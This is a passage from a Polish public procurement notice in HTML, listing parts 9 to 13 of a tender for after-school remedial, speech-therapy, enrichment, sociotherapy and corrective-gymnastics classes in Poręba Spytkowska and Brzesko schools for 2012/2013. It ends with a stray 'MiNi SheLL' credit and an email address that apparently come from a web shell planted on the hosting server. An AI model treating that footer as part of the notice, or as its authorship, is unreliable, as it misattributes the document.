-	Wymagania wstępne dla uczestników zajęć - uczniowie klas II wykazujący specyficzne trudności w nauce czytania i pisania, w tym zagrożeni dysleksją.

-	Ilość uczniów na zajęciach  - 8 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia z dziećmi wykazującymi specyficzne trudności w nauce czytania 
i pisania, w tym zagrożonych dysleksją. Grupa I i Grupa II
w PSP - Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:  
60  godzin  w roku szkolnym 2012/2013 (październik 2012r. - kwiecień 2013 r.).


-	Ilość grup: 2 


-	Metody pracy: zadaniowa, ćwiczenia


-	Formy pracy: indywidualna, grupowa

6.	Wymagania wstępne dla uczestników zajęć
uczniowie ze specyficznymi trudnościami w nauce czytania i pisania

-	Ilość uczniów na zajęciach - grupa I - 8 osób
                                                 grupa II - 8 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia logopedyczne z dziećmi, u których występują wady wymowy oraz trudności w nauce czytania i pisania w PSP - Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:       2 grupy po 30 godzin po 60 minut (lub 40 godzin po 45 minut) w roku szkolnym 2012/2013 (październik 2012r. - kwiecień 2013 r.).

-	Ilość grup: 2 - jeden nauczyciel
 
-	Metody pracy: nauka poprzez działanie - zadania, ćwiczenia w formie gier i zabaw logopedyczno-edukacyjnych

5.	Formy pracy: indywidualna, grupowa

-	Wymagania wstępne dla uczestników zajęć - uczniowie z wadami wymowy

-	Ilość uczniów na zajęciach - grupa - 4 osoby.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia rozwijające  z dziećmi wykazującymi uzdolnienia matematyczno-przyrodnicze w PSP - Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -Czas trwania i sposób realizacji:       60  godzin dla dwóch grup w roku szkolnym 2012/2013 (październik 2012r. - kwiecień 2013 r.).
-Ilość grup: 2 - jeden nauczyciel
-Metody pracy: zadaniowa, ćwiczenia, praktyczne, problemowe, podające, metody aktywizujące: gry i zabawy dydaktyczne, burza mózgów, eksperymenty.

-Formy pracy: indywidualna, grupowa
-Ilość uczniów na zajęciach - grupa I -11 osób, grupa II 11 osób.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Program zajęć socjoterapeutycznych dla dzieci z zaburzeniami w komunikacji 
      społecznej w PSP - Poręba Spytkowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:    30 godzin po 60 minut (lub 40 godzin po 45 minut) w roku szkolnym 2012/2013 (październik 2012r. - kwiecień 2013 r.).

-	Ilość grup: 1

-	Metody pracy: zadaniowa, ćwiczenia.

-	Formy pracy: indywidualna, grupowa.

-	Wymagania wstępne dla uczestników zajęć - uczniowie z dysfunkcjami 
i zaburzeniami utrudniającymi funkcjonowanie społeczne.

-	Ilość uczniów na zajęciach - grupa - 10 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia z dziećmi wykazującymi specyficzne zaburzenia w statyce ciała, zakwalifikowanymi przez lekarza do udziału w gimnastyce korekcyjnej w PSP - Brzesko 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Czas trwania i sposób realizacji:  30 godzin po 45 minut (2 razy w tygodniu) od października do marca, w roku szkolnym  2012/2013.
-	Ilość grup: 1.
-	Metody pracy: Nauczanie pojedynczych ćwiczeń ruchowych (syntetyczna, analityczna, kombinowana).Nauczanie ćwiczeń ruchowych w zależności od charakteru i rodzaju postrzegania zmysłowego (oglądowa, naśladowcza ścisła, słownego ujęcia ruchu, oddziaływania sensorycznego i prioprioreceptywnego). 
-	Formy pracy: indywidualna, grupowa.
-	Wymagania wstępne dla uczestników zajęć: uczniowie ze specyficznymi zaburzeniami w statyce ciała. 
-	Ilość uczniów na zajęciach: 8 osób..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com